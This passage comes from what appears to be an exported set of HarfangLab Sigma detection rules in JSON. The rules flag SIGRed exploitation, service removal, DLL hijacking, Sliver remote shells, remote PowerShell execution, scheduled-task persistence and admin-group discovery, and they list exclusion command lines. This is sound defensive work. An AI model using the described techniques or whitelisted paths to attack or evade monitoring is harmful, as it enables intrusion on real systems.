https://attack.mitre.org/techniques/T1210/\ndate: 2023/09/15\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - cve.2020-1350\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2020-1350\n - classification.Windows.Exploit.SIGRed\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\dns.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_conhost:\n Image:\n - '?:\\Windows\\System32\\conhost.exe'\n - '?:\\Windows\\SysWOW64\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_dnscmd:\n Image:\n - '?:\\Windows\\System32\\dnscmd.exe'\n - '?:\\Windows\\SysWOW64\\dnscmd.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_dns:\n Image: '?:\\Windows\\System32\\dns.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7bedad5-e7a1-408b-aad1-6e5919a2de49",
"rule_name": "Abnormal Process Started by dns.exe",
"rule_description": "Detects the execution of an abnormal process by dns.exe.\nThis action can be indicative of the exploitation of CVE-2020-1350 (aka SIGRed), a vulnerability in Microsoft's Domain Name System (DNS) implementation on Windows Server versions from 2003 to 2019.\nTo exploit this vulnerability, an unauthenticated attacker needs to send malicious requests to a vulnerable Windows DNS server.\nIf successfully exploited, the vulnerability allows the attacker to run arbitrary code in the context of the Local System Account.\nIt is recommended to investigate the process tree for suspicious activities and to isolate the infected system if the exploitation is confirmed.\n",
"rule_creation_date": "2023-09-15",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7c122a5-c2d4-4d1c-bebb-b396e044254d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086472Z",
"creation_date": "2026-03-23T11:45:34.086474Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086479Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_remove_service.yml",
"content": "title: Service Removed via PowerShell\nid: d7c122a5-c2d4-4d1c-bebb-b396e044254d\ndescription: |\n Detects the Remove-Service PowerShell cmdlet being used.\n Attackers may use this cmdlet to remove a specific services, such as security services.\n It is recommended to check if there is a legitimate reason for this service to be removed via PowerShell.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/10/15\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Remove-Service '\n\n # https://learn.microsoft.com/en-us/powershell/module/exchange/remove-serviceprincipal?view=exchange-ps\n exclusion_serviceprincipal:\n PowershellCommand|contains: 'Remove-ServicePrincipal'\n\n exclusion_exchange:\n ProcessInternalName:\n - 'ExSetupUI.exe'\n - 'ExSetup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_axiscommunication:\n PowershellScriptPath|startswith: '?:\\ProgramData\\Axis Communications\\'\n\n exclusion_scriptlaunchcache:\n PowershellScriptPath|startswith: '?:\\WINDOWS\\system32\\config\\systemprofile\\ScriptLaunchCache\\InstallAdminAgent.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7c122a5-c2d4-4d1c-bebb-b396e044254d",
"rule_name": "Service Removed via PowerShell",
"rule_description": "Detects the Remove-Service PowerShell cmdlet being used.\nAttackers may use this cmdlet to remove a specific services, such as security services.\nIt is recommended to check if there is a legitimate reason for this service to be removed via PowerShell.\n",
"rule_creation_date": "2021-10-15",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7d8cd4e-04dc-40b3-a834-8d3f13d58867",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601335Z",
"creation_date": "2026-03-23T11:45:34.601339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601346Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_repair_bde.yml",
"content": "title: DLL Hijacking via repair-bde.exe\nid: d7d8cd4e-04dc-40b3-a834-8d3f13d58867\ndescription: |\n Detects potential Windows DLL Hijacking via repair-bde.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'repair-bde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\BDEREPAIR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7d8cd4e-04dc-40b3-a834-8d3f13d58867",
"rule_name": "DLL Hijacking via repair-bde.exe",
"rule_description": "Detects potential Windows DLL Hijacking via repair-bde.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608930Z",
"creation_date": "2026-03-23T11:45:34.608933Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608941Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver",
"https://github.com/BishopFox/sliver/blob/master/implant/sliver/shell/shell_windows.go",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_sliver_interactive_shell.yml",
"content": "title: Suspicious Sliver Interactive Shell Executed\nid: d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0\ndescription: |\n Detects the usage of the Sliver interactive shell.\n Sliver is an open source cross-platform adversary emulation/red team framework to perform security testing.\n It is recommended to analyze the parent process and the context of this action, with the help of the process tree as well as to correlate this alert with other malicious actions on the host.\nreferences:\n - https://github.com/BishopFox/sliver\n - https://github.com/BishopFox/sliver/blob/master/implant/sliver/shell/shell_windows.go\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/10/14\nmodified: 2022/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Sliver\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0",
"rule_name": "Suspicious Sliver Interactive Shell Executed",
"rule_description": "Detects the usage of the Sliver interactive shell.\nSliver is an open source cross-platform adversary emulation/red team framework to perform security testing.\nIt is recommended to analyze the parent process and the context of this action, with the help of the process tree as well as to correlate this alert with other malicious actions on the host.\n",
"rule_creation_date": "2022-10-14",
"rule_modified_date": "2022-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d808495c-6318-462f-8fc6-c6e69c5e2c7f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090294Z",
"creation_date": "2026-03-23T11:45:34.090296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090300Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_powershell_invoke_command_remote.yml",
"content": "title: PowerShell Invoke-Command Executed on Remote Host\nid: d808495c-6318-462f-8fc6-c6e69c5e2c7f\ndescription: |\n Detects the execution of the Invoke-Command PowerShell cmdlet on remote host.\n Attackers can use this technique to execute remote commands on a target host, as part of lateral movement.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/11/07\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Invoke-Command -Comp'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_parentimage:\n ProcessParentImage: '?:\\Program Files\\Commvault\\ContentStore\\Base\\ADBackup.exe'\n\n exclusion_grandparentimage:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\CairnisAgent\\nvdkit.exe'\n\n exclusion_cairnis_agent:\n ProcessCommandLine|startswith: '?:/Windows/Sysnative/WindowsPowerShell/v1.0/PowerShell.exe -Executionpolicy remotesigned -File ?:/CairnisAgent/CAIDB/WS/CAIPWS_Command.ps1'\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d808495c-6318-462f-8fc6-c6e69c5e2c7f",
"rule_name": "PowerShell Invoke-Command Executed on Remote Host",
"rule_description": "Detects the execution of the Invoke-Command PowerShell cmdlet on remote host.\nAttackers can use this technique to execute remote commands on a target host, as part of lateral movement.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d81c9136-0e88-4664-8b26-032b35d6e555",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604729Z",
"creation_date": "2026-03-23T11:45:34.604732Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604740Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://nasbench.medium.com/a-deep-dive-into-windows-scheduled-tasks-and-the-processes-running-them-218d1eed4cce",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_scheduled_task_launched.yml",
"content": "title: Suspicious Scheduled Task Launched\nid: d81c9136-0e88-4664-8b26-032b35d6e555\ndescription: |\n Detects the execution of suspicious processes spawned directly by a scheduled task, such as powershell.exe, cmd.exe, or unusual script interpreters.\n Attackers often use scheduled tasks to establish a persistent execution of malicious code.\n It is recommended to investigate the command-line and any potential scripts it launches (by creating a file download job) to determine its maliciousness.\nreferences:\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://nasbench.medium.com/a-deep-dive-into-windows-scheduled-tasks-and-the-processes-running-them-218d1eed4cce\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2022/10/20\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '\\taskeng.exe' # on older windows versions\n\n selection_process:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe (PowerShell 6)\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n - 'MSHTA.EXE'\n - 'pythonw.exe'\n - 'python.exe'\n\n selection_moderate_directory:\n CommandLine|contains:\n - ':\\Users\\\\*\\AppData\\'\n - ':\\Windows\\Temp\\'\n# - ':\\ProgramData\\' Too many False-Positives\n\n selection_suspicious_directory:\n CommandLine|contains:\n - ':\\PerfLogs\\'\n - ':\\Users\\\\*\\AppData\\Roaming\\'\n - ':\\Users\\\\*\\AppData\\LocalLow\\'\n - ':\\Users\\Default\\'\n - ':\\Users\\Public\\'\n\n exclusion_cmd:\n CommandLine: '?:\\WINDOWS\\system32\\cmd.EXE /C ?:\\ProgramData\\Microsoft Services BootXRay\\BxrR\\Resource\\Invoke-BxrR__PostBootActions1.bat 120 60'\n\n exclusion_powershell:\n CommandLine:\n - 'powershell.exe -Command ipmo PSWindowsUpdate; Install-WindowsUpdate -AcceptAll -ignoreReboot'\n - '?:\\Windows\\system32\\cmd.EXE /c powershell.exe -executionpolicy bypass -NoProfile -File ?:/windows/temp/winrm-elevated-shell-????????-????-????-????-????????????.ps1 > ?:\\Users\\\\*cyberwatch*\\AppData\\Local\\Temp\\tmp*.tmp 2>?:\\Users\\\\*cyberwatch*\\AppData\\Local\\Temp\\tmp*.tmp'\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File ?:\\ProgramData\\Winget-AutoUpdate\\winget-upgrade.ps1'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe powershell -executionpolicy bypass -file ?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\data\\Maintenance.ps1'\n\n exclusion_cscript:\n CommandLine: '?:\\Windows\\system32\\cscript.exe /B /nologo ?:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor 604800000 ?:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)'\n\n exclusion_roaming:\n CommandLine|contains:\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressInvoice\\ExpressInvoice.exe -schedbackup'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\Inventoria\\Inventoria.exe -schedbackup'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe -downgrade'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\ExpressZip.exe -notifyinstalled'\n - '\\AppData\\Roaming\\NCH Software\\Program Files\\\\*\\\\*.exe -'\n - '\\AppData\\Roaming\\Real\\Update\\UpgradeHelper\\RealPlayer\\\\*\\agent\\rnupgagent.exe /'\n - '\\AppData\\Roaming\\Orange\\OrangeInside\\OrangeInside.exe'\n - '\\AppData\\Roaming\\NCH Software\\Program Files\\Pixillion\\pixillion.exe -downgrade'\n - '\\AppData\\Roaming\\Signiant\\SigniantApp.exe --checkRunning'\n - '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe --action=UpdateSchedule'\n - '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe --action=UpdateSchedule' # The two spaces are intentional\n - '\\AppData\\Roaming\\Zoom\\bin_??\\Zoom.exe --action=UpdateSchedule'\n\n exclusion_public:\n CommandLine:\n - '?:\\Users\\Public\\Documents\\Activer_framework_?_?.exe'\n - '?:\\Users\\Public\\Documents\\nettoyer_profil2.exe'\n - '?:\\Users\\Public\\Documents\\KIMO INSTRUMENTS\\\\*'\n - '?:\\Users\\Public\\TurboStnc\\TurboSyncService.exe -TASK RETOUR'\n\n exclusion_mylfp:\n CommandLine: '?:\\Windows\\System32\\wscript.exe ?:\\Users\\\\*\\AppData\\Roaming\\MyLFPAgent\\\\*\\MyLFPAgent.vbs'\n\n exclusion_watchdog:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\programdata\\cus\\watchdogreboot\\watchdogreboot.cmd'\n\n exclusion_microsoft_ep_man:\n CommandLine: 'powershell.exe -executionpolicy bypass -file ?:\\windows\\temp\\Install_Client_MECM.ps1'\n\n exclusion_turbosync:\n CommandLine|startswith: '?:\\users\\public\\turbosync\\turbosyncservice.exe'\n\n exclusion_cmd_common:\n CommandLine|startswith: 'cmd.exe /C START /MIN /D'\n\n condition: selection_parent and (selection_process and selection_moderate_directory or selection_suspicious_directory) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d81c9136-0e88-4664-8b26-032b35d6e555",
"rule_name": "Suspicious Scheduled Task Launched",
"rule_description": "Detects the execution of suspicious processes spawned directly by a scheduled task, such as powershell.exe, cmd.exe, or unusual script interpreters.\nAttackers often use scheduled tasks to establish a persistent execution of malicious code.\nIt is recommended to investigate the command-line and any potential scripts it launches (by creating a file download job) to determine its maliciousness.\n",
"rule_creation_date": "2022-10-20",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8214e01-f0fd-4297-a2ee-d06835cdad6e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622732Z",
"creation_date": "2026-03-23T11:45:34.622734Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622738Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_001_net_localgroup_administrators.yml",
"content": "title: Administrators Group Content Discovered\nid: d8214e01-f0fd-4297-a2ee-d06835cdad6e\ndescription: |\n Detects execution of 'net localgroup administrators' or 'net group \"domain admins\" /domain'.\n These commands are often used by attackers to enumerate the contents of the local or domain administrators group as part of initial access or lateral movement within a network.\n It is recommended to investigate such activity, and correlate it with other discovery activity on the endpoint.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net localgroup administrators\n # net group \"domain admins\" /domain\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n selection_3:\n # matches administrators, administrateurs, domain admin, ...\n CommandLine|contains: 'admin'\n\n # This is handled by other rules\n filter_command:\n CommandLine|contains:\n - '/add'\n - '/delete'\n - '/del'\n filter_admin:\n CommandLine|contains|all:\n - ' /dom'\n - ' admin'\n - ' domain'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_nexthink:\n GrandparentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine|contains: '-NoProfile -NoLogo -NonInteractive -Sta -ExecutionPolicy Unrestricted -File ?:\\ProgramData\\Nexthink\\RemoteActions\\Scripts\\System\\{????????-????-????-????-????????????}.ps1 -Whitelist'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|?:\\Program Files\\'\n - '|?:\\Program Files (x86)\\'\n - '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\aigaclient\\aiga.exe|'\n - '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\aigaserveur\\aiga.exe|'\n - '|?:\\Windows\\CCM\\CcmExec.exe|?:\\Windows\\System32\\services.exe|'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8214e01-f0fd-4297-a2ee-d06835cdad6e",
"rule_name": "Administrators Group Content Discovered",
"rule_description": "Detects execution of 'net localgroup administrators' or 'net group \"domain admins\" /domain'.\nThese commands are often used by attackers to enumerate the contents of the local or domain administrators group as part of initial access or lateral movement within a network.\nIt is recommended to investigate such activity, and correlate it with other discovery activity on the endpoint.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d84087b2-ec87-4a75-abe6-badf1ee886d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081335Z",
"creation_date": "2026-03-23T11:45:34.081337Z",
"enabled": true,
"hl_status": "stable",
